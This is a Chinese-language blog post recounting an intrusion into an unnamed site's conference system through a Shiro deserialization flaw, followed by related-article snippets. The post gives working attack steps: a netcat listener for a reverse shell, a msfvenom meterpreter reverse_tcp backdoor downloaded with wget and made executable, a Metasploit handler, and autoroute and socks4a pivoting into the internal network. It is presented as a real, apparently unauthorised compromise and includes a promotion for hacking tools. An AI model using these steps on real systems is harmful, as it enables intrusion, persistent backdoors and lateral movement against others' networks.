实战|某网站shiro反序列化漏洞的渗透过程

VSole2022-08-07 06:34:20

打进内网以后的过程没有继续深入搞,具体原因大家懂的,

前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户,

返回包存在 :Set-Cookie: rememberMe=deleteMe; 参数, 测试一下 shiro漏洞,万一没修复就捡到了,美滋滋

成功打到DNSLOG 返回信息

得到log,确定漏洞是存在的,脚本写入linux反弹shell的命令,

vps 开启NC 监听 nc -lvp 777 成功返回

获得服务器权限 root ,开始通过dnslog 知道服务器是通外网的,利用msf 生成 elf 后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf

关注公众号:hack之道,后台回复关键词:666,获取最新渗透教程和工具。

把生成好的后门放在远程HTTP服务上面,

在shell里,wget 远程下载

成功下载以后,chmod 给后门权限 777 就行,-rwxrwxrwx 1 root root

msf 运行命令 use exploit/multi/handler  获得shell反弹地址

set payload linux/x64/meterpreter/reverse_tcp

地址填写VPS 端口写后门端口就好了,直接run

查看内网路由,添加路由命令

run get_local_subnets //获取路由地址
run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
run autoroute -p //查看添加的路由
run autorouute -d //删除添加的路由

内网扫描端口 use auxiliary/scanner/portscan/tcp 

利用msf socks4a模块代理

use auxiliary/server/socks4a 
set SRVHOST IP
set SRVPORT 端口

运行返回信息:

msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server

本地利用代理连接 代理的服务器 设置好端口 ,浏览器访问

某会议系统

shiro序列化
本作品采用《CC 协议》,转载必须注明作者和本文链接
本文主要以抛出问题的方式,努力寻找在实际调试过程中遇到问题的真实答案,最后结合前辈们总结的知识点也用实践检验了知识点,特此记录。
首先在奇安信hunter上搜索找到该SRC的有关资产,然后通过微步来搜索子域名找到今天的测试站点
打进内网以后的过程没有继续深入搞,具体原因大家懂的,前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户
Shiro序列化漏洞修复的过程中,如果仅进行Shiro的版本升级,而没有重新生成密钥,那么AES加密的默认密钥扔硬编码在代码里,仍然会存在反序列化风险。
一次成功的Shiro Padding Oracle需要一直向服务器不断发包,判断服务器返回,攻击时间通常需要几个小时。因为这些程序没有对发包失败抛出异常的情况做出处理,从而导致工具停止工作。最终,攻击成功了,我虚拟机下花了不到1小时共计完成,但是在真实生产环境测试,攻击成功一次DNS或者JRMPClient攻击,程序需要跑大约4个小时左右,2次攻击加起来近9个小时。
Log4j漏洞、Shiro序列化漏洞被勒索团伙利用,威胁windows、linux双平台系统。
记一次内网实战
2022-12-21 09:30:38
记一次内网实战
最近想要针对Shiro的利用工具扩展利用链,但自己完全写一个工具即麻烦也没有必要,因此想要通过SummerSec师傅开源的工具ShiroAttack2扩展来实现,既然要扩展首先就得了解项目的源码实现。本片文章中我不会通篇的对这个项目代码进行分析,只抽出几个我认为的要点进行分析。
VSole
网络安全专家